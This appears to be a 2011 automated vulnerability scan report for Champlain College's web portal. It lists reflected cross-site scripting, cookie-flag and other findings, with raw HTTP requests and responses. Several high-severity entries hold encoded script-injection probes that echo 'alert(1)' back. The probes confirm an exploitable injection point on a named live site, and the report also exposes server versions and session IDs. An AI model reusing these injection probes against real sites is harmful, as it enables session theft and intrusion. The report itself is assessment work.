1. Cross-site scripting (reflected)
1.1. https://my.champlain.edu/feedback/allwidgets [REST URL parameter 2]
1.2. https://my.champlain.edu/feedback/allwidgets [REST URL parameter 2]
2. Cookie without HttpOnly flag set
2.1. https://my.champlain.edu/
2.2. https://my.champlain.edu/Page_Form_Misc_Bulletinboard/longdescription/id/{ID}
2.3. https://my.champlain.edu/Site-Map.html
2.4. https://my.champlain.edu/advising/curriculum/
2.5. https://my.champlain.edu/attendance/verification
2.6. https://my.champlain.edu/auth/login
2.7. https://my.champlain.edu/clearinghouse/launch
2.8. https://my.champlain.edu/course/selection
2.11. https://my.champlain.edu/index/index/forceload/true
2.12. https://my.champlain.edu/open/secure/group/facstaff/dir0/hr/file/Benefits_Enrollment_Guide.pdf
2.13. https://my.champlain.edu/page_hr_benefitsdocuments
2.14. https://my.champlain.edu/page_search/search/type/people/query/{QUERY}
2.15. https://my.champlain.edu/public/advising/pdfs/Spring
2.18. https://my.champlain.edu/public/human_resources/pandemic_form/
2.19. https://my.champlain.edu/store_widgetstore
2.20. https://my.champlain.edu/widget_campusdir/download
2.21. https://my.champlain.edu/widget_webadvisor/launch/page/webadvisor
2.22. https://my.champlain.edu/x1501.xml
2.23. https://my.champlain.edu/xhr/dird
2.24. https://my.champlain.edu/xhr/dirp
3. Password field with autocomplete enabled
3.1. https://my.champlain.edu/
3.2. https://my.champlain.edu/index/index/forceload/true
3.3. https://my.champlain.edu/widget_login
4.1. https://my.champlain.edu/advising/curriculum/
4.2. https://my.champlain.edu/media/changeaddr.html
4.3. https://my.champlain.edu/page_about
4.4. https://my.champlain.edu/page_authrequired
4.5. https://my.champlain.edu/public/human_resources/pandemic_form/
4.6. https://my.champlain.edu/xhr/dird
5.1. https://my.champlain.edu/media/changeaddr.html
5.2. https://my.champlain.edu/media/new_course_codes-Student.pdf
5.3. https://my.champlain.edu/scripts/prod/library/dojo/dijit/_editor/nls/commands.js
5.4. https://my.champlain.edu/scripts/prod/library/dojo/dijit/form/nls/Textarea.js
5.5. https://my.champlain.edu/scripts/prod/library/dojo/dijit/form/nls/validate.js
5.6. https://my.champlain.edu/scripts/prod/library/dojo/dijit/nls/common.js
5.7. https://my.champlain.edu/scripts/prod/library/dojo/dijit/nls/loading.js
6. HTML does not specify charset
6.1. https://my.champlain.edu/feedback/allwidgets
6.4. https://my.champlain.edu/page_form_misc_bulletinboard/show
6.5. https://my.champlain.edu/widget_campusdir/departmentlist
6.6. https://my.champlain.edu/widget_login
6.7. https://my.champlain.edu/widgets/widget_campusdir/
6.8. https://my.champlain.edu/widgets/widget_events/
6.9. https://my.champlain.edu/widgets/widget_resources/
6.10. https://my.champlain.edu/xhr/dird
6.11. https://my.champlain.edu/xhr/dirp
7. Content type incorrectly stated
7.1. https://my.champlain.edu/xhr/dird
7.2. https://my.champlain.edu/xhr/dirp
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets |
GET /feedback/allwidgets98d24%2527%253e Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:52:21 GMT Content-Length: 761 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... <div id='allwidgets98d24'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets |
GET /feedback/allwidgetscb2af%2527%253balert Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:52:41 GMT Content-Length: 716 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dashboard dojo.require("dijit dojo.addOnLoad(function() { dojo.byId('allwidgetscb2af';alert(1)/ }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/2470c%2527%253balert Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=ts8h3mj3ja X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:51 GMT Connection: close Content-Length: 686 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dashboard dojo.require("dijit dojo.addOnLoad(function() { dojo.byId('2470c';alert(1)/ }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/9ba99%2527%253e Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4rfig9b5rv X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:49 GMT Connection: close Content-Length: 731 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... <div id='9ba99'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/a3466%2527%253balert Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=c73lda2kt7 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:54:20 GMT Content-Length: 704 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dashboard dojo.require("dijit dojo.addOnLoad(function() { dojo.byId('a3466';alert(1)/ }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/ac116%2527%253e Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=sjn145h8cc X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:54:13 GMT Content-Length: 749 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... <div id='ac116'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/218d0%2527%253balert Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4uge8suiga X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 14:38:40 GMT Content-Length: 704 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dashboard dojo.require("dijit dojo.addOnLoad(function() { dojo.byId('218d0';alert(1)/ }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
GET /feedback/74e68%2527%253e Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=bkq9fusebm X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 14:38:34 GMT Content-Length: 749 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... <div id='74e68'><script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | / |
GET / HTTP/1.1 Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://search.champlain Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4d7d8kkrde X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:08:23 GMT Content-Length: 9068 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /Page_Form_Misc |
GET /Page_Form_Misc Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=bsccle2apn X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:26 GMT Connection: close Content-Length: 1224 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /Site-Map.html |
GET /Site-Map.html HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=22e31ie4h9 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:23 GMT Connection: close Content-Length: 1229 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /advising/curriculum/ |
GET /advising/curriculum/ HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=atvqqu6pjm X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:33 GMT Connection: close Content-Length: 172700 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /attendance/verification |
GET /attendance/verification HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=9f5r01ae59 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:36 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /auth/login |
GET /auth/login HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu/ Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=7iqu5o5djj X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:26 GMT Connection: close Content-Length: 148 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /clearinghouse/launch |
GET /clearinghouse/launch HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4kjfqb0ag5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:34 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /course/selection |
GET /course/selection HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=is33p11vuc X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:23 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
POST /feedback/allwidgets98d24 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Content-Length: 37 Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US renderableItem=%2Fshow |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=clgvlihm9n X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:53:45 GMT Content-Length: 761 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
POST /feedback/allwidgets98d24 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Content-Length: 37 Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US renderableItem=%2Fshow |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=1s8lc1gfnq X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 14:38:11 GMT Content-Length: 803 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /index/index/forceload |
GET /index/index/forceload Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=vjmhpnkk97 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:24 GMT Connection: close Content-Length: 9104 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /open/secure/group |
GET /open/secure/group Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=9l7i0kgs71 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:36 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /page_hr_benefitsdoc |
GET /page_hr_benefitsdoc Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=qa4pip8gmg X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:37 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /page_search/search/type |
GET /page_search/search/type Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=5ko8bbk1ki X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:24 GMT Connection: close Content-Length: 93 {"identifier":"id","items |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /public/advising/pdfs |
GET /public/advising/pdfs Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4b0ubnfblf X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:28 GMT Connection: close Content-Length: 1229 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /public/advising/pdfs |
GET /public/advising/pdfs Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=aamt9k61kj X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:28 GMT Connection: close Content-Length: 1229 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /public/advising/pdfs |
GET /public/advising/pdfs Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=8j8qaustuj X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:29 GMT Connection: close Content-Length: 1229 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /public/human_resources |
GET /public/human_resources Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=an4qlsuvvs X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:27 GMT Connection: close Content-Length: 2643 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /store_widgetstore |
GET /store_widgetstore HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=alpeioao11 Access-Control-Allow Access-Control-Allow X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:25 GMT Connection: close Content-Length: 9170 {"identifier":"widgetId", ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /widget_campusdir |
GET /widget_campusdir Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=sdf74ue68t X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:37 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /widget_webadvisor/launch |
GET /widget_webadvisor/launch Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
